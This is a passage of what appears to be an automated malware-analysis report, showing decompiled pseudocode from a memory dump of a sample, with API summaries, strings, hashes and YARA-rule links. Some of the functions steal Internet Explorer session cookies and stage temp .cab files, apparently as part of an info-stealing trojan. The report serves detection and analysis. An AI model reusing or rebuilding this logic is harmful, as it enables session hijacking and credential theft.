						MultiByteToWideChar(0, 0, _a16, _t75, _t77 + _t25 + 4, _t75);
					}
					if(_a4 == 0x45 || _a4 == 0x47) {
						_t53 = 1;
						__eflags = 1;
					} else {
						_t53 = 0;
					}
					E0040BDF2(0, _t53, 0, _t77);
					E0040F0C0(_t77);
					_t43 = _v5;
				}
				return 0 | _t43 == 0x00000000;
			}

























    0x00407bc8
    0x00407bcc
    0x00407c0b
    0x00407c20
    0x00407c21
    0x00407c2b
    0x00407c2e
    0x00407c33
    0x00407c40
    0x00407c43
    0x00407c4a
    0x00407c4c
    0x00407c4c
    0x00407c4e
    0x00407bd5
    0x00407bf8
    0x00407bfa
    0x00407bff
    0x00407bff
    0x00407c53
    0x00407c59
    0x00407c63
    0x00407c6a
    0x00407c6c
    0x00407c6d
    0x00407c7b
    0x00407c7f
    0x00407c86
    0x00407c88
    0x00407c89
    0x00407c8e
    0x00407c92
    0x00407c94
    0x00407c98
    0x00407ca5
    0x00407ca5
    0x00407cb0
    0x00407cbf
    0x00407cbf
    0x00407cb9
    0x00407cb9
    0x00407cb9
    0x00407cc6
    0x00407ccc
    0x00407cd1
    0x00407cd1
    0x00407ce1

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000004,?,00000002,?,00000022,00000000,?), ref: 00407CA5
      • Part of subcall function 0040F4DC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?,00000000,0040B681,00000001), ref: 0040F50D
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?), ref: 00407BF1
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ByteCharMultiWide$EnvironmentExpandFreeHeapStrings
    • String ID: G
    • API String ID: 2894312133-985283518
    • Opcode ID: 4388bce87f8b688e0c3f4eac196e126fc89fc075d19b531e8a1cc133a8761235
    • Instruction ID: fa6558d167a557baf384a7769db89d97370ff1dcafa1ecb54013ea2ef1ba8cfa
    • Opcode Fuzzy Hash: 4388bce87f8b688e0c3f4eac196e126fc89fc075d19b531e8a1cc133a8761235
    • Instruction Fuzzy Hash: 6D319731908208AADB25EFA4C885BDA77B8DF05304F10C47BF505B72D2E779DA49C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004091AE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91fileCOMMON
    Download Yara Rule
    C-Code - Quality: 30%
    			E004091AE(void* __ecx, void* __edx) {
				char _v8;
				void* _t5;
				void* _t6;
				signed short _t8;
				signed short _t9;
				signed int _t12;
				signed char _t15;
				signed int _t17;
				signed int _t20;
				void* _t22;
				void* _t26;
				void* _t31;
				signed int _t32;
				signed int _t34;

				_t26 = __edx;
				_t34 =  *0x416a54; // 0x0
				if(_t34 != 0) {
					L17:
					_t5 = 1;
				} else {
					_t6 =  *0x416a4c; // 0x0
					if(_t6 != 0) {
						L4:
						__eflags =  *0x416a50; // 0x0
						if(__eflags != 0) {
							L6:
							__eflags =  *0x416a54; // 0x0
							if(__eflags != 0) {
								goto L17;
							} else {
								_t32 =  *0x416ac4(0, _t31);
								__eflags = _t32;
								if(_t32 != 0) {
									_t8 =  *0x416e10(_t32, 8);
									 *0x416a5c = _t8;
									_t9 =  *0x416e10(_t32, 0xa);
									 *0x416a5e = _t9;
									__eflags =  *0x416dfc(_t32,  *0x416a5c & 0x0000ffff, _t9 & 0x0000ffff);
									if(__eflags == 0) {
										_t12 = 0;
										__eflags = 0;
									} else {
										_t12 = E004122EE(_t26, __eflags, _t32,  &_v8, 0x416a58, 0, _t11);
									}
									 *0x416a54 = _t12;
									__eflags = _t12;
									if(_t12 != 0) {
										_t25 = _v8;
										_t15 =  *(_v8 + 0xe) >> 3;
										 *0x416a64 = _t15;
										_t17 = (_t15 & 0x000000ff) * ( *0x416a5c & 0x0000ffff);
										 *0x416a60 = _t17;
										__eflags = _t17 & 0x00000003;
										if((_t17 & 0x00000003) != 0) {
											_t20 = (_t17 & 0xfffffffc) + 4;
											__eflags = _t20;
											 *0x416a60 = _t20;
										}
										E0040F0C0(_t25);
									}
									 *0x416acc(0, _t32);
								}
								__eflags =  *0x416a54; // 0x0
								if(__eflags == 0) {
									goto L3;
								} else {
									goto L17;
								}
							}
						} else {
							_t22 = MapViewOfFile(_t6, 2, 0, 0, 0);
							 *0x416a50 = _t22;
							__eflags = _t22;
							if(_t22 == 0) {
								goto L3;
							} else {
								goto L6;
							}
						}
					} else {
						_t6 = OpenFileMappingW(2, 0, L"QggrrtyW");
						 *0x416a4c = _t6;
						if(_t6 != 0) {
							goto L4;
						} else {
							L3:
							_t5 = 0;
						}
					}
				}
				return _t5;
			}

















    0x004091ae
    0x004091b5
    0x004091bb
    0x004092c2
    0x004092c2
    0x004091c1
    0x004091c1
    0x004091c8
    0x004091e8
    0x004091e8
    0x004091ee
    0x00409205
    0x00409205
    0x0040920b
    0x00000000
    0x00409211
    0x00409219
    0x0040921b
    0x0040921d
    0x00409226
    0x0040922f
    0x00409235
    0x00409242
    0x00409254
    0x00409256
    0x0040926b
    0x0040926b
    0x00409258
    0x00409264
    0x00409264
    0x0040926d
    0x00409272
    0x00409274
    0x00409276
    0x00409284
    0x00409288
    0x00409290
    0x00409293
    0x00409298
    0x0040929a
    0x0040929f
    0x0040929f
    0x004092a2
    0x004092a2
    0x004092a8
    0x004092a8
    0x004092af
    0x004092af
    0x004092b6
    0x004092bc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092bc
    0x004091f0
    0x004091f6
    0x004091fc
    0x00409201
    0x00409203
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409203
    0x004091ca
    0x004091d2
    0x004091d8
    0x004091df
    0x00000000
    0x004091e1
    0x004091e1
    0x004091e1
    0x004091e1
    0x004091df
    0x004091c8
    0x004092c6

    APIs
    • OpenFileMappingW.KERNEL32(00000002,00000000,QggrrtyW), ref: 004091D2
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 004091F6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$MappingOpenView
    • String ID: QggrrtyW
    • API String ID: 3439327939-3177217124
    • Opcode ID: 77e8ed7ddb4b49a65edf76b6c23dab62b0b1766b8ea498e893e1d5797670598e
    • Instruction ID: 39e17e35c4c1dc8bdcd45bf5b3e29a08e91e5b7f27767e8e919f423633711d0a
    • Opcode Fuzzy Hash: 77e8ed7ddb4b49a65edf76b6c23dab62b0b1766b8ea498e893e1d5797670598e
    • Instruction Fuzzy Hash: 1021B175601650BAC3219B259C089F73BA9EF82781715C57FF802F2AA1E779CD41C72C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004049FA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
    Download Yara Rule
    C-Code - Quality: 72%
    			E004049FA(void* __ebx) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __esi;
				signed int _t18;
				intOrPtr _t27;
				void* _t29;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t37;
				void* _t39;
				signed int _t40;
				void* _t42;
				void* _t47;

				_t40 = 0;
				_t37 = 0;
				_v8 = 0;
				 *0x416fe8(0x416758);
				_t18 = 0;
				_v16 = 0;
				_t42 =  *0x416770 - _t37; // 0x0
				if(_t42 <= 0) {
					L9:
					 *0x416fec(0x416758);
					E004084E1(_t37, _t47, 0, "PopOpO03-3331111", _t40);
					return E0040F0C0(_t40);
				}
				do {
					_t35 =  *0x416774; // 0x0
					_t23 = _t35 + _t18 * 4;
					if( *(_t35 + _t18 * 4) != 0) {
						_t36 = E0040F47D(_t23 | 0xffffffff,  *_t23);
						_v12 = _t36;
						if(_t36 != 0) {
							_t27 = E0040F521(_t36);
							_t34 = _t27 + _t37;
							_v20 = _t27;
							_t29 = E0040F053(_t34 + 1,  &_v8);
							_t40 = _v8;
							if(_t29 != 0) {
								E0040F0FC(_t37 + _t40, _v12, _v20);
								_t39 = _t34;
								 *((char*)(_t39 + _t40)) = 0x20;
								_t37 = _t39 + 1;
							}
							E0040F0C0(_v12);
						}
					}
					_t18 = _v16 + 1;
					_v16 = _t18;
					_t47 = _t18 -  *0x416770; // 0x0
				} while (_t47 < 0);
				goto L9;
			}



















    0x00404a02
    0x00404a09
    0x00404a0b
    0x00404a0e
    0x00404a14
    0x00404a16
    0x00404a19
    0x00404a1f
    0x00404a8d
    0x00404a92
    0x00404aa2
    0x00404ab0
    0x00404ab0
    0x00404a22
    0x00404a22
    0x00404a28
    0x00404a2e
    0x00404a3a
    0x00404a3c
    0x00404a41
    0x00404a43
    0x00404a48
    0x00404a4b
    0x00404a54
    0x00404a59
    0x00404a5e
    0x00404a69
    0x00404a6e
    0x00404a70
    0x00404a74
    0x00404a74
    0x00404a78
    0x00404a78
    0x00404a41
    0x00404a80
    0x00404a81
    0x00404a84
    0x00404a84
    0x00000000

    APIs
    • RtlEnterCriticalSection.NTDLL(00416758), ref: 00404A0E
    • RtlLeaveCriticalSection.NTDLL(00416758), ref: 00404A92
      • Part of subcall function 0040F47D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404A3A,00000000), ref: 0040F4AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$ByteCharEnterLeaveMultiWide
    • String ID: PopOpO03-3331111
    • API String ID: 3162664464-962168976
    • Opcode ID: 45377b6a5244ab6be35729156f860c6436f7ca14a4aa856f69dfd640224adb3a
    • Instruction ID: e21f73645756eadc82fd8c0ba6e590488bb70e0e8e9f28dd55a31350d4ca5084
    • Opcode Fuzzy Hash: 45377b6a5244ab6be35729156f860c6436f7ca14a4aa856f69dfd640224adb3a
    • Instruction Fuzzy Hash: BC11A271A00114AFCB21AF69CC45ADE7BB5FF81318F11407AE124B71D2D7399A45CB58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004154D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004154D1(void* __ecx, void* __edx, intOrPtr _a4) {
				short _v528;
				short _v1048;
				void* _t20;
				int _t25;
				void* _t26;
				void* _t27;

				_t27 = __edx;
				_t26 = __ecx;
				_t25 = 0;
				if(GetTempPathW(0xf6,  &_v1048) - 1 <= 0xf5 && GetTempFileNameW( &_v1048, L"bc", 0,  &_v528) > 0 && E0040FFBF( &_v528) != 0) {
					_t20 = E00411E20( &_v528, _a4);
					_t31 = _t20;
					if(_t20 != 0) {
						_t25 = E0041547E(_t26, _t27, _t31,  &_v528, _a4, L"mfplayer_cfg.cab");
						E0040FFBF( &_v528);
					}
				}
				return _t25;
			}









    0x004154d1
    0x004154d1
    0x004154e7
    0x004154f5
    0x0041552f
    0x00415534
    0x00415536
    0x0041554c
    0x00415555
    0x00415555
    0x00415536
    0x0041555e

    APIs
    • GetTempPathW.KERNEL32(000000F6,?,00000000), ref: 004154E9
    • GetTempFileNameW.KERNEL32(?,004042A0,00000000,?), ref: 0041550B
      • Part of subcall function 0040FFBF: SetFileAttributesW.KERNELBASE(?,00000020,00412063,?,?,?,00000000), ref: 0040FFC5
      • Part of subcall function 0040FFBF: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040FFCF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Temp$AttributesDeleteNamePath
    • String ID: mfplayer_cfg.cab
    • API String ID: 838033943-194030306
    • Opcode ID: 06502361bc92a5ea710a921492a91b02c3db3927516ef95a57ea7664feb2971b
    • Instruction ID: 6018a4fa7fcc0aa58145f6f666780cb80e5a267f2a02493b64736013f5823f4d
    • Opcode Fuzzy Hash: 06502361bc92a5ea710a921492a91b02c3db3927516ef95a57ea7664feb2971b
    • Instruction Fuzzy Hash: C601A7B294031DBACF20EBA4CC49EDA776D9B00345F0044B37B15E3182D278DAC98B28
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C616, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44networkCOMMON
    Download Yara Rule
    C-Code - Quality: 79%
    			E0040C616(void* __ecx, void* __edx, char* _a4) {
				long _v8;
				int _t14;
				char* _t21;

				_push(__ecx);
				if(InternetGetCookieA(_a4, 0, 0,  &_v8) != 0) {
					_t21 = E0040F0A8(_v8);
					if(_t21 != 0) {
						_t14 = InternetGetCookieA(_a4, 0, _t21,  &_v8);
						_t29 = _t14;
						if(_t14 != 0) {
							_push(_t21);
							E0041540F(__ecx, __edx, _t29, 1, 0, 0, L"%S\r\nIE session cookies:\r\n%S", _a4);
						}
						E0040F0C0(_t21);
					}
				}
				E004055B9(0);
				return E004051FC();
			}






    0x0040c619
    0x0040c62f
    0x0040c639
    0x0040c63d
    0x0040c648
    0x0040c64e
    0x0040c650
    0x0040c652
    0x0040c65f
    0x0040c664
    0x0040c668
    0x0040c668
    0x0040c63d
    0x0040c66e
    0x0040c67b

    APIs
    • InternetGetCookieA.WININET(00000000,00000000,00000000,?), ref: 0040C627
    • InternetGetCookieA.WININET(00000000,00000000,00000000,?), ref: 0040C648
    Strings
    • %SIE session cookies:%S, xrefs: 0040C656
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CookieInternet
    • String ID: %SIE session cookies:%S
    • API String ID: 930238652-348586552
    • Opcode ID: 5024ee257deaa8f7fa95423b45995ecad4d20e7b95a3ac448a8b635e975e8596
    • Instruction ID: 704ffb105910bf7bb8b5c78f2e2f725009f149a470ee5c2f22fd4ab64d611c3c
    • Opcode Fuzzy Hash: 5024ee257deaa8f7fa95423b45995ecad4d20e7b95a3ac448a8b635e975e8596
    • Instruction Fuzzy Hash: A5F06272201024B6C730AB67CC49DDF3E6CDF82B94B00403AB508B5092DA39DA44D6F8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0041195F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0041195F(intOrPtr _a4, intOrPtr _a12) {
				short _v524;
				void* __edi;
				int _t23;
				intOrPtr _t24;

				_t23 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E0040FFBF( &_v524) != 0) {
					_t24 = _a4;
					E0040F45E(PathFindFileNameW( &_v524), _t24 + 3);
					E0040F0FC(_t24, "?T", 2);
					 *((char*)(_t24 + 2)) = 0x5c;
					_t23 = 1;
				}
				return _t23;
			}







    0x00411973
    0x00411989
    0x0041199b
    0x004119b1
    0x004119be
    0x004119c3
    0x004119c9
    0x004119ca
    0x004119cf

    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00411981
      • Part of subcall function 0040FFBF: SetFileAttributesW.KERNELBASE(?,00000020,00412063,?,?,?,00000000), ref: 0040FFC5
      • Part of subcall function 0040FFBF: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040FFCF
    • PathFindFileNameW.SHLWAPI(?,?,?), ref: 004119A9
      • Part of subcall function 0040F45E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,004119B6,?,?), ref: 0040F471
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: 4b5e9faa64f98ba76e1f433cdf00d2b80cdc1486807a14bc8174442f0bbf3b2d
    • Instruction ID: 796f807081d87769f8cbe58b1e7ce3ea3eb509c13a4b8929cf0f9b7430ab8027
    • Opcode Fuzzy Hash: 4b5e9faa64f98ba76e1f433cdf00d2b80cdc1486807a14bc8174442f0bbf3b2d
    • Instruction Fuzzy Hash: 52F028B2A0032467CB30ABA5DC0AFCB77BC8F45740F0145767A56F35D1D638EA488A94
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A659, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
    Download Yara Rule
    C-Code - Quality: 90%
    			E0040A659(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, char _a8) {
				intOrPtr _t4;
				int _t5;
				intOrPtr _t8;
				intOrPtr _t10;

				_t10 = __edx;
				_t8 = __ecx;
				_t4 = 0x402325;
				if(__edx == 0) {
					_t10 = 0x402325;
				}
				if(_t8 == 0) {
					_t8 = _t4;
				}
				if(_a4 != 0) {
					_t4 = _a4;
				}
				_t3 =  &_a8; // 0x402325
				_t5 = wnsprintfA( *_t3, 0x103, "%s|%s|%s", _t4, _t8, _t10);
				asm("sbb al, al");
				return _t5 + 0xfffffffffffffffc;
			}







    0x0040a659
    0x0040a659
    0x0040a659
    0x0040a660
    0x0040a662
    0x0040a662
    0x0040a666
    0x0040a668
    0x0040a668
    0x0040a66f
    0x0040a671
    0x0040a671
    0x0040a682
    0x0040a686
    0x0040a699
    0x0040a69d

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: wnsprintf
    • String ID: %#@$%s|%s|%s
    • API String ID: 167729887-3117937203
    • Opcode ID: 31e7a16b93228799043f4922bab922d7e50e1f6b6f4be4f849ac52abaeb53ced
    • Instruction ID: b0288632795957ebeb2539a976ce5e4b15338f1fbbd8a95846d8f0ed32c79e93
    • Opcode Fuzzy Hash: 31e7a16b93228799043f4922bab922d7e50e1f6b6f4be4f849ac52abaeb53ced
    • Instruction Fuzzy Hash: 5AE080707403026BEB194638CE19F7F21B5DBE0B44F58C53DB591A62D0E67DCC158315
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00415561, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7stringCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00415561(WCHAR* _a4) {

				lstrcpyW(_a4, 0x417478);
				return lstrcatW(_a4, L".lll");
			}



    0x0041556a
    0x0041557f

    APIs
    • lstrcpyW.KERNEL32(004158C0,00417478), ref: 0041556A
    • lstrcatW.KERNEL32(?,.lll), ref: 00415579
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: lstrcatlstrcpy
    • String ID: .lll
    • API String ID: 3905823039-2905095309
    • Opcode ID: b961af1f7a15148f21815a32fb42ddb21dcae1292a419d420e1b1c82f0a3b6f6
    • Instruction ID: c2209d89a82b7f3fb4dc143ab61358adad5c3df97a6e666740324b0d9a566fcd
    • Opcode Fuzzy Hash: b961af1f7a15148f21815a32fb42ddb21dcae1292a419d420e1b1c82f0a3b6f6
    • Instruction Fuzzy Hash: D6C04C75284302ABC6016B10DC099597E62BBA0782B12C679F145500B0C7B68461DA19
    Uniqueness

    Uniqueness Score: -1.00%